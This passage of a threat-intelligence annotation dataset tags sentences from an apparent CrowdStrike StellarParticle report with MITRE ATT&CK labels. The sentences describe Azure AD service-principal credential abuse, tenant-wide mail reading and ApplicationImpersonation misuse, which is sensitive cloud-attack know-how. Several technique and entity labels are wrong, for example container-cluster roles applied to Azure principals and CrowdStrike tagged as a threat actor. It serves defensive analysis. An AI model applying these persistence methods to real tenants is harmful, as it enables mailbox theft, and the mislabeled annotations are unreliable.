the user the threat actor used to RDP to the vCenter server).", "sentence_text": "The logs contained commands issued and the count of the results returned for a specific command.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s95-2277b0", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 95, "context_before": "The logs contained commands issued and the count of the results returned for a specific command.", "sentence_text": "The commands included enumeration queries such as:\nListAccountSkus\nListPartnerContracts\nListServicePrincipals\nListServicePrincipalCredentials\nListRoles\nListRoleMembers\nListUsers\nListDomains\nGetRoleMember\nGetPartnerInformation\nGetCompanyInformation\nIn this case, however, the most significant and concerning log entry was one that indicated the command AddServicePrincipalCredentials was executed.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1098.006", "name": "Additional Container Cluster Roles" } ], "procedure": "Executed the AddServicePrincipalCredentials command.", "entities": [ { "text": "AddServicePrincipalCredentials", "start": 352, "end": 382, "label": "Infrastructure_Indicator" }, { "text": "ListAccountSkus", "start": 51, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "ListPartnerContracts", "start": 67, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "ListServicePrincipals", "start": 88, "end": 109, "label": "Infrastructure_Indicator" }, { "text": "ListServicePrincipalCredentials", "start": 110, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "ListRoles", "start": 142, "end": 151, "label": "Infrastructure_Indicator" }, { "text": "ListRoleMembers", "start": 152, "end": 167, "label": "Infrastructure_Indicator" }, { "text": "ListUsers", "start": 168, "end": 177, "label": "Infrastructure_Indicator" }, { "text": "ListDomains", "start": 178, "end": 189, "label": "Infrastructure_Indicator" }, { "text": "GetRoleMember", "start": 190, "end": 203, "label": "Infrastructure_Indicator" }, { "text": "GetCompanyInformation", "start": 226, "end": 247, "label": "Infrastructure_Indicator" }, { "text": "GetPartnerInformation", "start": 204, "end": 225, "label": "Infrastructure_Indicator" }, { "text": "executed.", "start": 387, "end": 396, "label": "Action" }, { "text": "indicated", "start": 330, "end": 339, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s96-d74b32", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 96, "context_before": "The commands included enumeration queries such as:\nListAccountSkus\nListPartnerContracts\nListServicePrincipals\nListServicePrincipalCredentials\nListRoles\nListRoleMembers\nListUsers\nListDomains\nGetRoleMember\nGetPartnerInformation\nGetCompanyInformation\nIn this case, however, the most significant and concerning log entry was one that indicated the command AddServicePrincipalCredentials was executed.", "sentence_text": "By taking the timestamp that the command was executed via the PowerShell logs on the local system, CrowdStrike analyzed the configuration settings in the victim’s O365 tenant and discovered that a new secret had been added to a built-in Microsoft Azure AD Enterprise Application, Service Principal, which had Application level permissions.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098.006", "name": "Additional Container Cluster Roles" } ], "procedure": "Added a new secret to an Azure AD Service Principal.", "entities": [ { "text": "PowerShell logs", "start": 62, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "O365 tenant", "start": 163, "end": 174, "label": "Infrastructure_Indicator" }, { "text": "new secret ", "start": 197, "end": 208, "label": "Infrastructure_Indicator" }, { "text": "built-in Microsoft Azure AD Enterprise Application", "start": 228, "end": 278, "label": "Infrastructure_Indicator" }, { "text": "Service Principal,", "start": 280, "end": 298, "label": "Infrastructure_Indicator" }, { "text": "Application level permissions", "start": 309, "end": 338, "label": "Infrastructure_Indicator" }, { "text": "added ", "start": 217, "end": 223, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s97-ae87e2", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 97, "context_before": "By taking the timestamp that the command was executed via the PowerShell logs on the local system, CrowdStrike analyzed the configuration settings in the victim’s O365 tenant and discovered that a new secret had been added to a built-in Microsoft Azure AD Enterprise Application, Service Principal, which had Application level permissions.", "sentence_text": "Further, the newly added secret was set to remain valid for more than a decade .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s98-47718a", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 98, "context_before": "Further, the newly added secret was set to remain valid for more than a decade .", "sentence_text": "This data was acquired by exporting the secrets and certificates details for each Azure AD Enterprise Application.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s99-c05252", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 99, "context_before": "This data was acquired by exporting the secrets and certificates details for each Azure AD Enterprise Application.", "sentence_text": "The Service Principal (now renamed to ) had the following permissions at the time the configuration settings were collected:\nMember.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s100-03dc23", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 100, "context_before": "The Service Principal (now renamed to ) had the following permissions at the time the configuration settings were collected:\nMember.", "sentence_text": "Read\nMember.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s120-44e694", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 120, "context_before": "All\nWebHook.Read.", "sentence_text": "All\nWebHook.ReadWrite.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s121-ee1f39", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 121, "context_before": "All\nWebHook.ReadWrite.", "sentence_text": "All\nthis application likely had the following permissions around the time of registration:\nMail.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s122-815ffa", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 122, "context_before": "All\nthis application likely had the following permissions around the time of registration:\nMail.", "sentence_text": "Read\nGroup.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s124-8bb202", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 124, "context_before": "Read.", "sentence_text": "All\nFiles.Read.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s127-d4c734", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 127, "context_before": "ReadWrite.", "sentence_text": "All\nThe most notable permissions above are the Mail.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s128-8b3063", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 128, "context_before": "All\nThe most notable permissions above are the Mail.", "sentence_text": "Read , Files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s129-8f57a9", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 129, "context_before": "Read , Files.", "sentence_text": "Read and Member.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s130-c34a66", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 130, "context_before": "Read and Member.", "sentence_text": "ReadWrite permissions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s131-48dd90", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 131, "context_before": "ReadWrite permissions.", "sentence_text": "These permissions would allow the threat actor to use the service principal to read all mail and SharePoint/OneDrive files in the organization, as well as create new accounts and assign administrator privileges to any account in the organization.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1098.003", "name": "Additional Cloud Roles" } ], "procedure": "Used the service principal to read organizational mail and files, create accounts, and assign administrator privileges", "entities": [ { "text": "threat actor ", "start": 34, "end": 47, "label": "ThreatActor" }, { "text": "service principal ", "start": 58, "end": 76, "label": "MalwareTool" }, { "text": "mail ", "start": 88, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "SharePoint/OneDrive files ", "start": 97, "end": 123, "label": "Infrastructure_Indicator" }, { "text": "new accounts", "start": 162, "end": 174, "label": "Infrastructure_Indicator" }, { "text": "administrator privileges", "start": 186, "end": 210, "label": "Infrastructure_Indicator" }, { "text": "read all mail ", "start": 79, "end": 93, "label": "Action" }, { "text": "create new accounts", "start": 155, "end": 174, "label": "Action" }, { "text": "assign administrator privileges", "start": 179, "end": 210, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s132-fa0d84", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 132, "context_before": "These permissions would allow the threat actor to use the service principal to read all mail and SharePoint/OneDrive files in the organization, as well as create new accounts and assign administrator privileges to any account in the organization.", "sentence_text": "By running the commands from within the victim’s environment, MFA requirements were bypassed due to conditional access policies not covering Service Principal sign-ins at this point of time.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Ran commands from inside the victim environment to bypass MFA for Service Principal sign-ins.", "entities": [ { "text": "MFA requirements", "start": 62, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "conditional access policies ", "start": 100, "end": 128, "label": "Infrastructure_Indicator" }, { "text": "Service Principal sign-ins", "start": 141, "end": 167, "label": "Infrastructure_Indicator" }, { "text": "running the commands ", "start": 3, "end": 24, "label": "Action" }, { "text": " bypassed ", "start": 83, "end": 93, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s133-4923c9", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 133, "context_before": "By running the commands from within the victim’s environment, MFA requirements were bypassed due to conditional access policies not covering Service Principal sign-ins at this point of time.", "sentence_text": "While the bulk of the evidence for this activity came from the text-based O365 PowerShell logs, the NTUSER.DAT registry hive for the user that was running the PowerShell cmdlets also included information on the accounts that were used to authenticate to the cloud.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552.002", "name": "Credentials in Registry" } ], "procedure": "Used PowerShell cmdlets that authenticated to cloud accounts, leaving evidence in logs and the NTUSER.DAT registry hive", "entities": [ { "text": "PowerShell cmdlets", "start": 159, "end": 177, "label": "MalwareTool" }, { "text": "NTUSER.DAT registry hive", "start": 100, "end": 124, "label": "Infrastructure_Indicator" }, { "text": " text-based O365 PowerShell logs", "start": 62, "end": 94, "label": "Action" }, { "text": "accounts ", "start": 211, "end": 220, "label": "Infrastructure_Indicator" }, { "text": "cloud", "start": 258, "end": 263, "label": "Infrastructure_Indicator" }, { "text": "running ", "start": 147, "end": 155, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s134-47d3fa", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 134, "context_before": "While the bulk of the evidence for this activity came from the text-based O365 PowerShell logs, the NTUSER.DAT registry hive for the user that was running the PowerShell cmdlets also included information on the accounts that were used to authenticate to the cloud.", "sentence_text": "This information was stored under the registry path.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s135-120b21", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 135, "context_before": "This information was stored under the registry path.", "sentence_text": "Below is an example of the registry data:\nThe same WSMan connection string was also located in the user’s NTUSER.DAT registry hive under the path:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s136-ba457a", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 136, "context_before": "Below is an example of the registry data:\nThe same WSMan connection string was also located in the user’s NTUSER.DAT registry hive under the path:", "sentence_text": "While not strictly related to the O365 PowerShell activity, the Windows Event Log also included information on connection attempts made to external O365 tenants.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s137-948bc9", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 137, "context_before": "While not strictly related to the O365 PowerShell activity, the Windows Event Log also included information on connection attempts made to external O365 tenants.", "sentence_text": "This information was logged under Event ID 6.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s138-24aa82", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 138, "context_before": "This information was logged under Event ID 6.", "sentence_text": "Below is an example of what the event included:\nO365 Company Service Principal Manipulation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s139-70942b", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 139, "context_before": "Below is an example of what the event included:\nO365 Company Service Principal Manipulation", "sentence_text": "The threat actor also deployed several layers of persistence utilizing both pre-existing and threat actor-created Service Principals with the ultimate goal of gaining global access to email.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098.006", "name": "Additional Container Cluster Roles" } ], "procedure": "Deployed multiple layers of persistence using pre-existing and attacker-created Service Principals to gain global email access", "entities": [ { "text": " threat actor ", "start": 3, "end": 17, "label": "ThreatActor" }, { "text": "pre-existing and threat actor-created Service Principals ", "start": 76, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "global access to email.", "start": 167, "end": 190, "label": "Infrastructure_Indicator" }, { "text": "deployed several layers of persistence ", "start": 22, "end": 61, "label": "Action" }, { "text": "utilizing", "start": 61, "end": 70, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s140-edb92b", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 140, "context_before": "The threat actor also deployed several layers of persistence utilizing both pre-existing and threat actor-created Service Principals with the ultimate goal of gaining global access to email.", "sentence_text": "Attacker-created Service Principal First, the threat actor used a compromised O365 administrator account to create a new Service Principal with a generic name.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098.006", "name": "Additional Container Cluster Roles" } ], "procedure": "Used a compromised O365 administrator account to create a new Service Principal", "entities": [ { "text": "threat actor ", "start": 46, "end": 59, "label": "ThreatActor" }, { "text": "Service Principal ", "start": 17, "end": 35, "label": "Infrastructure_Indicator" }, { "text": "O365 administrator account", "start": 78, "end": 104, "label": "Infrastructure_Indicator" }, { "text": "generic name", "start": 146, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "used a compromised O365 administrator account", "start": 59, "end": 104, "label": "Action" }, { "text": "create a new Service Principal ", "start": 108, "end": 139, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s141-863ce6", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 141, "context_before": "Attacker-created Service Principal First, the threat actor used a compromised O365 administrator account to create a new Service Principal with a generic name.", "sentence_text": "This Service Principal was granted company administrator privileges.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s142-d8b10e", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 142, "context_before": "This Service Principal was granted company administrator privileges.", "sentence_text": "These actions were recorded in Unified Audit Logs with the following three operation names:\nAdd service principal Add member to role Add service principal credentials.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1098.006", "name": "Additional Container Cluster Roles" } ], "procedure": "Recorded operations showing the addition of a service principal, adding it to a role, and adding its credentials.", "entities": [ { "text": "Unified Audit Logs", "start": 31, "end": 49, "label": "Infrastructure_Indicator" }, { "text": "Add service principal", "start": 92, "end": 113, "label": "Infrastructure_Indicator" }, { "text": "Add member to role ", "start": 114, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "Add service principal credentials.", "start": 133, "end": 167, "label": "Infrastructure_Indicator" }, { "text": "recorded ", "start": 19, "end": 28, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s143-74b765", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 143, "context_before": "These actions were recorded in Unified Audit Logs with the following three operation names:\nAdd service principal Add member to role Add service principal credentials.", "sentence_text": "Update Service Principal Company-Created Service Principal Hijacking Next, the threat actor utilized the threat actor-created Service Principal to take control of a second Service Principal.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1098.006", "name": "Additional Container Cluster Roles" } ], "procedure": "Used an attacker-created Service Principal to take control of another Service Principal", "entities": [ { "text": "threat actor", "start": 105, "end": 117, "label": "ThreatActor" }, { "text": "Service Principal ", "start": 7, "end": 25, "label": "MalwareTool" }, { "text": "threat actor-created Service Principal ", "start": 105, "end": 144, "label": "Infrastructure_Indicator" }, { "text": " take control of a second Service Principal.", "start": 146, "end": 190, "label": "Action" }, { "text": "utilized the threat actor", "start": 92, "end": 117, "label": "MalwareTool" }, { "text": "Service Principal.", "start": 172, "end": 190, "label": "MalwareTool" } ] }, { "uid": "mitre-84_mitre_report-p1-s144-f923c0", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 144, "context_before": "Update Service Principal Company-Created Service Principal Hijacking Next, the threat actor utilized the threat actor-created Service Principal to take control of a second Service Principal.", "sentence_text": "This was done by adding credentials to this second Service Principal, which was legitimately created by the company.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098.006", "name": "Additional Container Cluster Roles" } ], "procedure": "Added credentials to a second Service Principal created by the company", "entities": [ { "text": "Service Principal", "start": 51, "end": 68, "label": "MalwareTool" }, { "text": "credentials", "start": 24, "end": 35, "label": "Infrastructure_Indicator" }, { "text": " company", "start": 107, "end": 115, "label": "Infrastructure_Indicator" }, { "text": "second Service Principal", "start": 44, "end": 68, "label": "Action" }, { "text": "adding credentials", "start": 17, "end": 35, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s145-0119fb", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 145, "context_before": "This was done by adding credentials to this second Service Principal, which was legitimately created by the company.", "sentence_text": "This now compromised company-created Service Principal had mail.read graph permissions consented on behalf of all users within the tenant.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "Compromised a company-created Service Principal with mail.read permissions consented across the tenant.", "entities": [ { "text": "Service Principal ", "start": 37, "end": 55, "label": "MalwareTool" }, { "text": "mail.read graph permissions ", "start": 59, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "all users", "start": 110, "end": 119, "label": "Infrastructure_Indicator" }, { "text": "tenant", "start": 131, "end": 137, "label": "Infrastructure_Indicator" }, { "text": "consented on behalf of all users", "start": 87, "end": 119, "label": "Action" }, { "text": "compromised company-created Service Principal", "start": 9, "end": 54, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s146-9be5ad", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 146, "context_before": "This now compromised company-created Service Principal had mail.read graph permissions consented on behalf of all users within the tenant.", "sentence_text": "This action was recorded by just one operation type in Unified Audit Logs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s147-a9b08b", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 147, "context_before": "This action was recorded by just one operation type in Unified Audit Logs.", "sentence_text": "This operation type is named Add service principal credentials Mail.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s148-6b83a8", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 148, "context_before": "This operation type is named Add service principal credentials Mail.", "sentence_text": "Read Service Principal Abuse Finally, the threat actor utilized the compromised Service Principal with the assigned mail.read permissions to then read emails of several different users in the company’s environment.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1114.002", "name": "Remote Email Collection" } ], "procedure": "Used a compromised Service Principal with mail.read permissions to read multiple users’ emails", "entities": [ { "text": "threat actor ", "start": 42, "end": 55, "label": "ThreatActor" }, { "text": " Service Principal", "start": 79, "end": 97, "label": "MalwareTool" }, { "text": "mail.read permissions", "start": 116, "end": 137, "label": "Infrastructure_Indicator" }, { "text": " emails of several different users ", "start": 150, "end": 185, "label": "Infrastructure_Indicator" }, { "text": "utilized the compromised Service Principa", "start": 55, "end": 96, "label": "Action" }, { "text": "read emails of several different users", "start": 146, "end": 184, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s149-2f614c", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 149, "context_before": "Read Service Principal Abuse Finally, the threat actor utilized the compromised Service Principal with the assigned mail.read permissions to then read emails of several different users in the company’s environment.", "sentence_text": "CrowdStrike was able to use the Unified Audit Logs’ (UAL)\nMailItemsAccessed\noperation events to see the exact emails the threat actor viewed, as the majority of the users in the tenant were assigned O365 E5 licenses.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1114.002", "name": "Remote Email Collection" } ], "procedure": "The threat actor viewed emails, confirmed via MailItemsAccessed events in Unified Audit Logs", "entities": [ { "text": "threat actor ", "start": 121, "end": 134, "label": "ThreatActor" }, { "text": "Unified Audit Logs’ (UAL)", "start": 32, "end": 57, "label": "Infrastructure_Indicator" }, { "text": "MailItemsAccessed\noperation events ", "start": 58, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "O365 E5 licenses", "start": 199, "end": 215, "label": "Infrastructure_Indicator" }, { "text": "viewed,", "start": 134, "end": 141, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s150-c64855", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 150, "context_before": "CrowdStrike was able to use the Unified Audit Logs’ (UAL)\nMailItemsAccessed\noperation events to see the exact emails the threat actor viewed, as the majority of the users in the tenant were assigned O365 E5 licenses.", "sentence_text": "When performing analysis on the UAL, CrowdStrike used the ClientAppId value within the MailItemsAccessed operation and cross-correlated with the Application ID of the compromised service principal to see what activities were performed by the threat actor.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "Identified which activities the threat actor performed by correlating ClientAppId with the compromised Service Principal’s Application ID.", "entities": [ { "text": "threat actor", "start": 242, "end": 254, "label": "ThreatActor" }, { "text": "compromised service principal ", "start": 167, "end": 197, "label": "Infrastructure_Indicator" }, { "text": "UAL,", "start": 32, "end": 36, "label": "Infrastructure_Indicator" }, { "text": "ClientAppId", "start": 58, "end": 69, "label": "Infrastructure_Indicator" }, { "text": "MailItemsAccessed operation", "start": 87, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "Application ID", "start": 145, "end": 159, "label": "Infrastructure_Indicator" }, { "text": "used the ClientAppId", "start": 49, "end": 69, "label": "Action" }, { "text": "performed", "start": 225, "end": 234, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s151-3bf936", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 151, "context_before": "When performing analysis on the UAL, CrowdStrike used the ClientAppId value within the MailItemsAccessed operation and cross-correlated with the Application ID of the compromised service principal to see what activities were performed by the threat actor.", "sentence_text": "O365 Application Impersonation Another consistent TTP identified during StellarParticle investigations has been the abuse of the ApplicationImpersonation role.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1098.002", "name": "Additional Email Delegate Permissions" }, { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "Abused the ApplicationImpersonation role in O365", "entities": [ { "text": "StellarParticle", "start": 72, "end": 87, "label": "ThreatActor" }, { "text": "ApplicationImpersonation role", "start": 129, "end": 158, "label": "MalwareTool" }, { "text": "abuse of the ApplicationImpersonation role", "start": 116, "end": 158, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s152-fd6fba", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 152, "context_before": "O365 Application Impersonation Another consistent TTP identified during StellarParticle investigations has been the abuse of the ApplicationImpersonation role.", "sentence_text": "When this role was assigned to a particular user that was controlled by the threat actor, it allowed the threat actor to impersonate any user within the O365 environment.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1098.002", "name": "Additional Email Delegate Permissions" } ], "procedure": "The threat actor controlled a user with an impersonation-enabled role and used it to impersonate any user in the O365 environment", "entities": [ { "text": "threat actor,", "start": 76, "end": 89, "label": "ThreatActor" }, { "text": "O365 environment", "start": 153, "end": 169, "label": "Infrastructure_Indicator" }, { "text": "any user", "start": 133, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "assigned to a particular user", "start": 19, "end": 48, "label": "Action" }, { "text": "controlled by the threat actor,", "start": 58, "end": 89, "label": "Action" }, { "text": "impersonate any user", "start": 121, "end": 141, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s153-c8771f", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 153, "context_before": "When this role was assigned to a particular user that was controlled by the threat actor, it allowed the threat actor to impersonate any user within the O365 environment.", "sentence_text": "These impersonated events are not logged verbosely by the Unified Audit Logs and can be difficult to detect.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s154-3659bf", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 154, "context_before": "These impersonated events are not logged verbosely by the Unified Audit Logs and can be difficult to detect.", "sentence_text": "While the assignment of these ApplicationImpersonation roles were not logged in the Unified Audit Logs, CrowdStrike was able to identify this persistence mechanism via the management role configuration settings, which can be exported with the Exchange PowerShell command:\nGet-ManagementRoleAssignment -Role ApplicationImpersonation ApplicationImpersonation roles during the known periods of compromise.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098.002", "name": "Additional Email Delegate Permissions" } ], "procedure": "ApplicationImpersonation role assignments created during the compromise persisted and were detectable through management role configuration settings.", "entities": [ { "text": "CrowdStrike", "start": 104, "end": 115, "label": "ThreatActor" }, { "text": "Exchange PowerShell command", "start": 243, "end": 270, "label": "MalwareTool" }, { "text": "Get-ManagementRoleAssignment ", "start": 272, "end": 301, "label": "MalwareTool" }, { "text": "ManagementRoleAssignment", "start": 276, "end": 300, "label": "MalwareTool" }, { "text": "ApplicationImpersonation roles", "start": 332, "end": 362, "label": "Infrastructure_Indicator" }, { "text": "management role configuration settings", "start": 172, "end": 210, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s155-2d92a5", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 155, "context_before": "While the assignment of these ApplicationImpersonation roles were not logged in the Unified Audit Logs, CrowdStrike was able to identify this persistence mechanism via the management role configuration settings, which can be exported with the Exchange PowerShell command:\nGet-ManagementRoleAssignment -Role ApplicationImpersonation ApplicationImpersonation roles during the known periods of compromise.", "sentence_text": "Remote Tasklist\nThe threat actor attempted to remotely list running processes on systems using tasklist.exe .", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Attempted to remotely list running processes using tasklist.exe", "entities": [ { "text": "threat actor ", "start": 20, "end": 33, "label": "ThreatActor" }, { "text": "tasklist.exe", "start": 95, "end": 107, "label": "MalwareTool" }, { "text": "running processes", "start": 60, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "systems ", "start": 81, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "attempted to remotely list running processes", "start": 33, "end": 77, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s156-cb3caf", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 156, "context_before": "Remote Tasklist\nThe threat actor attempted to remotely list running processes on systems using tasklist.exe .", "sentence_text": "As tasklist uses WMI “under the hood,” this activity was captured by Falcon as SuspiciousWmiQuery events that included the query and the source system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s157-b8d83d", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 157, "context_before": "As tasklist uses WMI “under the hood,” this activity was captured by Falcon as SuspiciousWmiQuery events that included the query and the source system.", "sentence_text": "Additionally, the failed (not successful) process listing resulted in a DCOM error that was logged in the System.evtx event log under Event ID 10028.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s158-91084b", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 158, "context_before": "Additionally, the failed (not successful) process listing resulted in a DCOM error that was logged in the System.evtx event log under Event ID 10028.", "sentence_text": "A sample of the information included with this event is below:\nThis remote process listing was consistently used by the threat actor targeting the same or similar lists of remote systems, and the owners of the targeted systems also happened to be the individuals with cloud access that the threat actor was interested in.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1057", "name": "Process 